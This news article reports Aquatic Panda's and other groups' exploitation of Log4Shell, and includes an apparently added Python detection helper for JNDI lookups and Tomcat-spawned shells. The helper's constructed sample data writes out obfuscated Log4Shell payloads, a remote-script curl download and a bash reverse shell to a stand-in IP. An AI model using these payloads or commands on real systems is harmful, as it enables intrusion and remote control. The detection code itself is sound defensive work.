Aquatic Panda, a China-based threat group, is exploiting the Log4j vulnerability (Log4Shell) to attack large academic institutions, and has gathered credentials on compromised hosts to support further exploitation.
According to CrowdStrike, Aquatic Panda has been active since at least May 2020 and is now exploiting Log4Shell (CVE-2021-44228).
CrowdStrike researchers noticed unusual activity around an Apache Tomcat server running on a vulnerable VMware Horizon instance operated by a large academic institution.
The firm detected and contained the intrusion on the strength of actionable alerts.
Aquatic Panda is known for stealing intellectual property and other trade secrets, maintaining long-term access to victim networks with persistence tooling.
In this intrusion the attackers first ran connectivity checks: DNS lookups for a subdomain under the Apache Tomcat service hosted on the VMware Horizon instance. A Log4Shell payload forces the vulnerable server to resolve an attacker-chosen hostname, so an observed lookup confirms the target is exploitable before any tooling is delivered.
They then executed a series of Linux commands, including curl and wget, and attempted to launch a bash shell with a hardcoded IP address.
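The two stages described above (a JNDI lookup that makes the server resolve an attacker hostname, then curl/wget/bash spawned by the Tomcat service) are both visible in ordinary telemetry. The following triage helper is an added example, not CrowdStrike's tooling or anything recovered from the intrusion: it normalises the common Log4j lookup obfuscations (`${lower:j}`, `${::-j}`, URL-encoding) before matching `${jndi:...}` in access-log lines, and flags download or shell commands whose parent is a Tomcat or Java process. The access-log lines, the process records and the parent name `ws_TomcatService.exe` are all constructed for illustration.

```python
"""Triage helper for Log4Shell (CVE-2021-44228) activity in Tomcat access logs
and process-creation telemetry.  Added example with constructed sample data;
it is not CrowdStrike's code nor anything taken from the intrusion."""
import re
from urllib.parse import unquote

JNDI_SCHEMES = ("ldap", "ldaps", "rmi", "dns", "iiop", "corba", "nds", "http")
_JNDI_RE = re.compile(r"\$\{jndi:(%s)://([^/\s}]+)" % "|".join(JNDI_SCHEMES))
# ${lower:j} / ${upper:J} and ${::-j} / ${env:NOPE:-j} are the usual tricks
# used to hide the literal string "jndi" from naive pattern matching.
_LOWER_UPPER_RE = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
_DEFAULT_RE = re.compile(r"\$\{[^{}]*:-([^{}])\}")
_IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Tools worth flagging when a web/Java service spawns them.
DOWNLOADERS = ("curl", "wget", "bash", "sh", "powershell", "certutil")


def normalize(text):
    """Undo URL-encoding and nested Log4j lookups so that obfuscated payloads
    collapse to plain ${jndi:scheme://host...} in lower case."""
    text = unquote(unquote(text))  # payloads are often double-encoded
    prev = None
    while prev != text:            # repeat until no nested lookup remains
        prev = text
        text = _LOWER_UPPER_RE.sub(lambda m: m.group(1), text)
        text = _DEFAULT_RE.sub(lambda m: m.group(1), text)
    return text.lower()


def find_jndi(access_line):
    """Return (scheme, callback host[:port]) for a JNDI lookup in a log line,
    or None.  The callback host is the DNS name the server will resolve."""
    m = _JNDI_RE.search(normalize(access_line))
    return (m.group(1), m.group(2)) if m else None


def suspicious_child(event):
    """Flag download/shell tools spawned by a Tomcat or Java parent and pull
    out any hardcoded IP literals from the command line.  `event` is a
    constructed process-creation record with 'parent' and 'cmdline' keys."""
    parent = event["parent"].lower()
    if not any(tag in parent for tag in ("tomcat", "java")):
        return None
    tools = set()
    for tok in event["cmdline"].split():
        name = re.split(r"[\\/]", tok)[-1].lower()
        name = name[:-4] if name.endswith(".exe") else name
        if name in DOWNLOADERS:
            tools.add(name)
    if not tools:
        return None
    return {"tools": sorted(tools),
            "ips": _IP_RE.findall(event["cmdline"]),
            "cmdline": event["cmdline"]}


def triage(access_lines, process_events):
    """Run both detections and return the findings as one report."""
    report = {"jndi_lookups": [], "spawned_tools": []}
    for line in access_lines:
        hit = find_jndi(line)
        if hit:
            report["jndi_lookups"].append({"scheme": hit[0], "callback": hit[1]})
    for ev in process_events:
        hit = suspicious_child(ev)
        if hit:
            report["spawned_tools"].append(hit)
    return report


# Constructed Tomcat access-log lines (combined format); not real traffic.
ACCESS_LOG = [
    '10.0.0.7 - - [15/Dec/2021:09:12:01 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Dec/2021:09:12:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [15/Dec/2021:09:12:06 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Adns%3A%2F%2Fcheck.example.net%2Fx%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.9 - - [15/Dec/2021:09:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9:1099/x}"',
]

# Constructed process-creation records (parent image, child command line).
PROCESS_EVENTS = [
    {"parent": "ws_TomcatService.exe", "cmdline": "curl -s http://203.0.113.9/a.sh -o /tmp/a.sh"},
    {"parent": "explorer.exe", "cmdline": "curl https://updates.example.com/x"},
    {"parent": "java", "cmdline": "whoami"},
    {"parent": "ws_TomcatService.exe", "cmdline": "bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"},
]

if __name__ == "__main__":
    for key, hits in triage(ACCESS_LOG, PROCESS_EVENTS).items():
        print(key)
        for hit in hits:
            print("  ", hit)
```

The DNS connectivity check noted above shows up as the `callback` value: even when the LDAP or RMI stage never completes, the vulnerable host has already resolved that name, so a resolver log or egress DNS capture containing it is a reliable early indicator.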
CrowdStrike linked the remote infrastructure used in the attack to Aquatic Panda.
Other Chinese groups, as well as groups from other countries, are also abusing the Log4j vulnerability, according to Mandiant and Microsoft.
Microsoft observed HAFNIUM using the vulnerability against virtualization infrastructure, relying on a DNS service normally associated with testing activity to fingerprint systems.
Threat groups affiliated with Iran, Turkey and North Korea have also used Log4Shell in attacks, according to Microsoft.
Meanwhile, the US Federal Trade Commission (FTC) has warned businesses to remediate the flaw in the Log4j Java logging library as soon as possible, adding that it intends to pursue legal action against companies that fail to do so.
Log4j is embedded in a large number of applications running on millions of systems across many industries, so the attack surface is far larger than first anticipated. Several government security agencies and private companies have already issued warnings about exploitation of Log4j vulnerabilities.